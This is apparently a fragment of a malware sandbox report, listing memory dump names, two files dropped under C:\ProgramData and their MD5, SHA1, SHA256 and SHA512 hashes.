SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

memory/4520-905-0x00007FF7363E0000-0x00007FF736923000-memory.dmp

memory/4640-916-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\63508229815107759479390265

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\abcpy.ini

MD5 818d3a4899c5596d8d8da00a87e6d8bb
SHA1 4e0e04f5ca5d81661702877852fd9d059722762f
SHA256 9986830f6e44d24b86936851c2c0cd961ecdddbed3b34e8f6a64693f36e9429d
SHA512 1cd1c882adcee3d89bdc2b07ccf8d4913149565085d42e0f67a4c08b4c4d504b51c9ae44a11de906a1aed202391eb2b3461f63268158b6879cae9a18d56da239